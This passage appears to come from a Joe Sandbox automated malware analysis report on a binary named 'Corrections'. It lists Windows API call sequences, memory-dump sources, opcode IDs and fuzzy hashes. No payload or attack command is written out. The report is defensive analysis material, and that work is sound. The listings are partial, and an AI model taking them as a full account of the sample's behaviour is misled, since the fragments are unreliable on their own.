                                                                                                                                                                                                                                                                                              • Part of subcall function 00927873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009278B1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00927873: GetStockObject.GDI32(00000011), ref: 009278C5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00927873: SendMessageW.USER32(00000000,00000030,00000000), ref: 009278CF
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009B4BB0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009B4BBD
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009B4BC8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009B4BD7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009B4BE3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                            • Opcode ID: 58d6faeef843b09d9065603e6c7e3e2a960a8a12cb4eead56e75532ce72df4a4
                                                                                                                                                                                                                                                                                            • Instruction ID: 245881c654f3a5db807dd3e2035d7557da5669d72f9818422059fead4824e7cc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58d6faeef843b09d9065603e6c7e3e2a960a8a12cb4eead56e75532ce72df4a4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA1193B1550219BEEF119FA5CC85EEB7F5DEF087A8F014110B608A6050CA71DC21DBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0095DB23: _free.LIBCMT ref: 0095DB4C
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095DBAD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00952D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4), ref: 00952D4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00952D38: GetLastError.KERNEL32(009F1DC4,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4,009F1DC4), ref: 00952D60
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095DBB8
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095DBC3
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095DC17
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095DC22
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095DC2D
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095DC38
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                            • Instruction ID: fd5f73355be96607845d11ad9138902019dd3bd883efa398a22b9a3932a0596f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F118172542B04BAD530FBB2DC07FCB77ED9F96702F400D19BA99AA192DA74B5088750
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0098E328
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 0098E32F
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0098E345
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 0098E34C
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0098E390
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0098E36D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                            • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                            • Opcode ID: 8ff99d4916d8fdc7bf82bb1fa710ab1fe415e6035dd2b5588aaa76537b773a6b
                                                                                                                                                                                                                                                                                            • Instruction ID: 350c06b4d380f1c8dba643d9a271a8e21b158f35fc4380aaec97b44b48fa9b83
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ff99d4916d8fdc7bf82bb1fa710ab1fe415e6035dd2b5588aaa76537b773a6b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 520186F6904208BFE711A7A4DE89EEB776CD708710F0046A2B746E6041F6749E845B75
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00991322
                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,?), ref: 00991334
                                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,000001F6), ref: 00991342
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00991350
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0099135F
                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0099136F
                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 00991376
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3c9555ad5c800e84250fa6640b281716b60e352c8f2698e648e850a6f7f2154b
                                                                                                                                                                                                                                                                                            • Instruction ID: 222976a055938a8563b2751b4fe088c88b046b30ec0961f87fefdd4713ab5900
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c9555ad5c800e84250fa6640b281716b60e352c8f2698e648e850a6f7f2154b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07F0EC3205B612BBD7451B54EF49BD6BB39FF04316F401221F101918A0A7749471EF90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 009A281D
                                                                                                                                                                                                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009A283E
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 009A284F
                                                                                                                                                                                                                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 009A2938
                                                                                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 009A28E9
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098433E: _strlen.LIBCMT ref: 00984348
                                                                                                                                                                                                                                                                                              • Part of subcall function 009A3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0099F669), ref: 009A3C9D
                                                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 009A2992
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 201e8695ce1a0698712069c48f8fef79eec19145e8d0a66fb650e386bd413d53
                                                                                                                                                                                                                                                                                            • Instruction ID: 113ff7f8617eedc3fad500040fff6518306130102cebd41dfb68eedbd757d0d9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 201e8695ce1a0698712069c48f8fef79eec19145e8d0a66fb650e386bd413d53
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60B1C075604301AFD324DF28C885F2AB7E9AF89318F54854CF49A5B2E2DB31EE41CB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 0095042A
                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00950446
                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 0095045D
                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0095047B
                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00950492
                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009504B0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                            • Instruction ID: 4d8cc2b0d75a166479db7bf73b8c85fceff4d68bc2e76570ec3007360e35322c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36811A72600B0A9BD724EF6ACC81B6E73E8AFC4725F24452AFD11D7691F770D9088B94
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00948649,00948649,?,?,?,009567C2,00000001,00000001,8BE85006), ref: 009565CB
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009567C2,00000001,00000001,8BE85006,?,?,?), ref: 00956651
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0095674B
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00956758
                                                                                                                                                                                                                                                                                              • Part of subcall function 00953B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A79,?,0000015D,?,?,?,?,009485B0,000000FF,00000000,?,?), ref: 00953BC5
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00956761
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00956786
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c130f06ddb1dfd95acb9c141e245b021b73a4d26f0e052ed7ebb0d1d7d514e11
                                                                                                                                                                                                                                                                                            • Instruction ID: 6f16d63ad1fb357e564740f68c02900119ec9002a0d831ba41999b35ba020940
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c130f06ddb1dfd95acb9c141e245b021b73a4d26f0e052ed7ebb0d1d7d514e11
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B51EF72610206ABEB24CF66CC81FBA7BAAEB88755F544668FC04D7140EB35DC58C7A0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AC10E,?,?), ref: 009AD415
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD451
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4C8
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4FE
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009AC72A
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009AC785
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 009AC7CA
                                                                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009AC7F9
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 009AC853
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 009AC85F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 03081a5c4a2193110b6c6faacc1152e2345b33c12b2f5881e454d58a93988371
                                                                                                                                                                                                                                                                                            • Instruction ID: b9668c4191f8ce67dea127a827944988c1f9ba8f49a96f311d5e7a0fbe5e54dd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03081a5c4a2193110b6c6faacc1152e2345b33c12b2f5881e454d58a93988371
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6818EB5208241AFD714DF24C885F2ABBE9FF85308F14895CF5598B2A2DB31ED45CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 009800A9
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00980150
                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00980354,00000000), ref: 00980179
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00980354), ref: 0098019D
                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00980354,00000000), ref: 009801A1
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 009801AB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                            • Opcode ID: bf340a61bfa3d222218c7bcbd5c54f3c968a9376746642be9086cd1731ff6570
                                                                                                                                                                                                                                                                                            • Instruction ID: 7361c21b18a95c8f5852eb957142906590aedafff892ff0be9fe179ed9a9f574
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf340a61bfa3d222218c7bcbd5c54f3c968a9376746642be9086cd1731ff6570
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3551D635614310AADFA0BF64D889B2DB3A9EFC5310F148446F906DF396DAB49C48CB56
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009241EA: _wcslen.LIBCMT ref: 009241EF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A
                                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00999F2A
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00999F4B
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00999F72
                                                                                                                                                                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00999FCA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                                                            • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                            • Opcode ID: 6292b0167846a3742d6cf35d5253bbf5de893562c4a9f4487a40c81f6ec06b34
                                                                                                                                                                                                                                                                                            • Instruction ID: e6df29c81ba19ee61fc2248a38bf4daf5c5652aaae315cc1661bcc20605cacb5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6292b0167846a3742d6cf35d5253bbf5de893562c4a9f4487a40c81f6ec06b34
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05E192715083509FDB24EF28D881B6AB7E4BFC5314F04896DF8899B2A2DB31DD45CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00996F21
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0099707E
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(009C0CC4,00000000,00000001,009C0B34,?), ref: 00997095
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00997319
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
